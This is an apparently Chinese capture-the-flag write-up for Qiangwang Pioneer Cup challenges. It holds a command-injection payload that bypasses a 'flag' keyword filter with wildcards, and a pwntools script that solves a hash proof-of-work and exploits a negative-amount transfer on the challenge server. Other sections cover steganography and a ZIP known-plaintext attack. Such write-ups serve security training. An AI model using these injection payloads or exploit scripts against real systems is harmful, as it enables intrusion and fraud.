强网先锋杯部分WP

misc-签到

给了flag,直接提交

强网先锋-主动

命令注入
过滤了flag,可以用linux通配符代替,?代表任意一个字符。cat fla?.php读出来后可以在右键查看源代码中看到flag.
还可以用
base64tacsort等等
payload:

ip=127.0.0.1;base64%20fla?.php;

强网先锋-upload

流量包分析
用wireshark打开流量包,按长度排序可以看到上传了一张图片,将图片保存带本地。
也可以放到kali里面使用以下命令分析图片。
foremost data.pcapng
继续追踪http流,看到了这句话:
在这里插入图片描述

steghide隐写
在命令行使用以下命令:
steghide extract -sf test.jpg -p 123456
这个密码真是运气好,试了好几个密码good,password,steghide等等都不对,最后试了试steghide的readme.md里面的默认密码是123456。
爆破也可以得出来密码。

强网先锋-bank

transact 转账发现test 1账户转出了一块钱,那转test -1000不就够了么。下面附上脚本

import string
import hashlib
import re
from pwn import *

strs = string.ascii_letters + string.digits
r = remote('39.101.134.52',8005)
s0 = r.recvuntil('\n')
s1 = re.findall("XXX\+(.*?)\)",s0)[0]
s2 = re.findall("== (.*)",s0)[0]

for i in strs:
    for j in strs:
        for k in strs:
            x = hashlib.sha256()
            x.update((i+j+k+s1).encode())
            if x.hexdigest()==s2:
                res = i+j+k
                break
r.recvuntil('XXX:')
r.send(res)

r.recvuntil('teamtoken:')
r.send('icqe7248f5fec8e016f74cfaa6448fb2')
r.recvuntil('give me your name:')
r.send('KLY')

r.recvuntil('> ')
r.send('transact')
r.recvuntil('> ')
r.send('test -1000')
r.recvuntil('> ')
r.send('get flag')

问卷调查

略略略

level7

zip文本攻击
解压出来发现1.png和level7.zip中的1.png的CRC一样
在这里插入图片描述
在这里插入图片描述

将1.png压缩为1.zip。用AZPR的文本攻击模块破解压缩包。将破解的压缩包保存,解压就得到了level7.zip中的4.png和5.png。
在这里插入图片描述
盲水印
观察4.png和5.png大小不同但是图片一样,猜测为盲水印。可以用BlindWaterMark-master工具破解。
破解盲水印的py脚本有好几种,用blind-watermark-master的py2版本发现破解不出来,都试了一下,发现使用bwmforpy3.py可以破解得到

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值